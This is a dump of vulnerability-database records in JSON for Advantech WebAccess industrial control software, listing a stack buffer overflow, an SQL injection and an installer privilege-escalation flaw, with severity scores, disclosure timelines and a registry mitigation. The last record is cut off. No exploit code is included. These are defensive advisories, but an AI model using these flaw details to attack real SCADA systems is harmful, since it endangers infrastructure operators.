This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-549" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-549" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-549", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-549", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-549" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within RtspVapgDecoderNew2.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-549" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4068", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-549", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-549" } ] }, "id": "VAR-201708-1711", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:07:05.657000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\73888E2B-FF04-416c-8847-984D7FC4507FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-549" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-549" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-549", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-549", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-549", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess RtspVapgDecoderNew2 SetPaybackFilePath Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-549" } ], "trust": 0.7 } }
var-201601-0641
Vulnerability from variot
SQL injection vulnerability in Advantech WebAccess before 8.1 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities: 1. A denial-of-service vulnerability 2. An arbitrary file-upload vulnerability 3. A directory-traversal vulnerability 4. Multiple stack-based buffer-overflow vulnerabilities 5. A heap-based buffer overflow vulnerability 6. Multiple buffer-overflow vulnerabilities 7. Multiple information disclosure vulnerabilities 8. A cross-site scripting vulnerability 9. An SQL-injection vulnerability 10. A cross-site request forgery vulnerability 11. A remote-code execution vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences ('../') to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. Advantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201601-0641", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "8.1" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "8.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "7.2" }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "64e47f1c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00425" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006783" }, { "db": "CNNVD", "id": "CNNVD-201601-321" }, { "db": "NVD", "id": "CVE-2015-3947" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006783" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Ilya Karpov of Positive Technologies, Ivan Sanchez, Andrea Micalizzi, Ariele Caltabiano, Fritz Sands, Steven Seeley, and an anonymous researcher", "sources": [ { "db": "BID", "id": "80745" } ], "trust": 0.3 }, "cve": "CVE-2015-3947", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2015-3947", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CNVD-2016-00425", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "64e47f1c-2351-11e6-abef-000c29c66e3d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "VHN-81908", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.8, "id": "CVE-2015-3947", "impactScore": 5.2, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2015-3947", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2015-3947", "trust": 0.8, "value": "Medium" }, { "author": "CNVD", "id": "CNVD-2016-00425", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201601-321", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "64e47f1c-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-81908", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "64e47f1c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00425" }, { "db": "VULHUB", "id": "VHN-81908" }, { "db": "JVNDB", "id": "JVNDB-2015-006783" }, { "db": "CNNVD", "id": "CNNVD-201601-321" }, { "db": "NVD", "id": "CVE-2015-3947" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SQL injection vulnerability in Advantech WebAccess before 8.1 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to following security vulnerabilities:\n1. A denial-of-service vulnerability\n2. An arbitrary file-upload vulnerability\n3. A directory-traversal vulnerability\n4. Multiple stack-based buffer-overflow vulnerabilities\n5. A heap-based buffer overflow vulnerability\n6. Multiple buffer-overflow vulnerabilities\n7. Multiple information disclosure vulnerabilities\n8. A cross-site scripting vulnerability\n9. An SQL-injection vulnerability\n10. A cross-site request forgery vulnerability\n11. A remote-code execution vulnerability\nAn attacker can exploit these issues to execute arbitrary code in the context of the application, cause a denial-of-service condition, upload arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, to use directory-traversal sequences (\u0027../\u0027) to retrieve arbitrary files, obtain sensitive information and perform certain unauthorized actions. This may aid in further attacks. \nAdvantech WebAccess 8.0 and prior versions are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech", "sources": [ { "db": "NVD", "id": "CVE-2015-3947" }, { "db": "JVNDB", "id": "JVNDB-2015-006783" }, { "db": "CNVD", "id": "CNVD-2016-00425" }, { "db": "BID", "id": "80745" }, { "db": "IVD", "id": "64e47f1c-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-81908" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2015-3947", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-16-014-01", "trust": 2.8 }, { "db": "CNNVD", "id": "CNNVD-201601-321", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2016-00425", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2015-006783", "trust": 0.8 }, { "db": "BID", "id": "80745", "trust": 0.3 }, { "db": "IVD", "id": "64E47F1C-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-81908", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "64e47f1c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00425" }, { "db": "VULHUB", "id": "VHN-81908" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006783" }, { "db": "CNNVD", "id": "CNNVD-201601-321" }, { "db": "NVD", "id": "CVE-2015-3947" } ] }, "id": "VAR-201601-0641", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "64e47f1c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00425" }, { "db": "VULHUB", "id": "VHN-81908" } ], "trust": 1.33470696 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "64e47f1c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00425" } ] }, "last_update_date": "2024-11-23T21:43:23.261000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess SQL Injection Vulnerability (CNVD-2016-00425)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/70369" }, { "title": "Advantech WebAccess SQL Repair measures for injecting vulnerabilities", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=59639" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00425" }, { "db": "JVNDB", "id": "JVNDB-2015-006783" }, { "db": "CNNVD", "id": "CNNVD-201601-321" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-89", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-81908" }, { "db": "JVNDB", "id": "JVNDB-2015-006783" }, { "db": "NVD", "id": "CVE-2015-3947" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "https://ics-cert.us-cert.gov/advisories/icsa-16-014-01" }, { "trust": 1.4, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-3947" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-3947" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-00425" }, { "db": "VULHUB", "id": "VHN-81908" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006783" }, { "db": "CNNVD", "id": "CNNVD-201601-321" }, { "db": "NVD", "id": "CVE-2015-3947" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "64e47f1c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00425" }, { "db": "VULHUB", "id": "VHN-81908" }, { "db": "BID", "id": "80745" }, { "db": "JVNDB", "id": "JVNDB-2015-006783" }, { "db": "CNNVD", "id": "CNNVD-201601-321" }, { "db": "NVD", "id": "CVE-2015-3947" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "IVD", "id": "64e47f1c-2351-11e6-abef-000c29c66e3d" }, { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00425" }, { "date": "2016-01-15T00:00:00", "db": "VULHUB", "id": "VHN-81908" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-19T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006783" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-321" }, { "date": "2016-01-15T03:59:02.497000", "db": "NVD", "id": "CVE-2015-3947" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-30T00:00:00", "db": "CNVD", "id": "CNVD-2016-00425" }, { "date": "2016-01-18T00:00:00", "db": "VULHUB", "id": "VHN-81908" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-19T00:00:00", "db": "JVNDB", "id": "JVNDB-2015-006783" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-321" }, { "date": "2024-11-21T02:30:07.243000", "db": "NVD", "id": "CVE-2015-3947" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-321" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess In SQL Injection vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2015-006783" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "SQL injection", "sources": [ { "db": "IVD", "id": "64e47f1c-2351-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201601-321" } ], "trust": 0.8 } }
var-201810-0492
Vulnerability from variot
WebAccess Versions 8.3.2 and prior. During installation, the application installer disables user access control and does not re-enable it after the installation is complete. This could allow an attacker to run elevated arbitrary code. WebAccess Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows local attackers to escalate privileges on vulnerable installations of Advantech WebAccess Node. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the access controls that are set and modified during the installation of the product. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. Advantech WebAccess is prone to the following security vulnerabilities: 1. A stack-based buffer overflow vulnerability 2. This may aid in further attacks. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.8, "vendor": "advantech", "version": "8.3.2" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 1.4, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.3.2" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1331" }, { "db": "ZDI", "id": "ZDI-18-1329" }, { "db": "CNVD", "id": "CNVD-2018-21936" }, { "db": "BID", "id": "105736" }, { "db": "JVNDB", "id": "JVNDB-2018-011341" }, { "db": "CNNVD", "id": "CNNVD-201810-1272" }, { "db": "NVD", "id": "CVE-2018-17908" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-011341" } ] }, "credits": { "_id": null, "data": "Mat Powell of Trend Micro Zero Day Initiative", "sources": [ { "db": "ZDI", "id": "ZDI-18-1331" }, { "db": "ZDI", "id": "ZDI-18-1329" } ], "trust": 1.4 }, "cve": "CVE-2018-17908", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "CVE-2018-17908", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-21936", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 3.9, "id": "VHN-128414", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 1.8, "id": "CVE-2018-17908", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, { "attackComplexity": "LOW", "attackVector": "LOCAL", "author": "ZDI", "availabilityImpact": "HIGH", "baseScore": 8.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "exploitabilityScore": 2.5, "id": "CVE-2018-17908", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.4, "userInteraction": "NONE", "vectorString": "AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "ZDI", "id": "CVE-2018-17908", "trust": 1.4, "value": "HIGH" }, { "author": "nvd@nist.gov", "id": "CVE-2018-17908", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2018-17908", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2018-21936", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201810-1272", "trust": 0.6, "value": "HIGH" }, { "author": "IVD", "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1", "trust": 0.2, "value": "HIGH" }, { "author": "VULHUB", "id": "VHN-128414", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2fec8cf-39ab-11e9-89cc-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1331" }, { "db": "ZDI", "id": "ZDI-18-1329" }, { "db": "CNVD", "id": "CNVD-2018-21936" }, { "db": "VULHUB", "id": "VHN-128414" }, { "db": "JVNDB", "id": "JVNDB-2018-011341" }, { "db": "CNNVD", "id": "CNNVD-201810-1272" }, { "db": "NVD", "id": "CVE-2018-17908" } ] }, "description": { "_id": null, "data": "WebAccess Versions 8.3.2 and prior. During installation, the application installer disables user access control and does not re-enable it after the installation is complete. This could allow an attacker to run elevated arbitrary code. WebAccess Contains an access control vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows local attackers to escalate privileges on vulnerable installations of Advantech WebAccess Node. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the access controls that are set and modified during the installation of the product. Advantech (Advantech) WebAccess software is the core of Advantech\u0027s IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. Advantech WebAccess is prone to the following security vulnerabilities:\n1. A stack-based buffer overflow vulnerability\n2. This may aid in further attacks. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. The software supports dynamic graphic display and real-time data control, and provides functions of remote control and management of automation equipment", "sources": [ { "db": "NVD", "id": "CVE-2018-17908" }, { "db": "JVNDB", "id": "JVNDB-2018-011341" }, { "db": "ZDI", "id": "ZDI-18-1331" }, { "db": 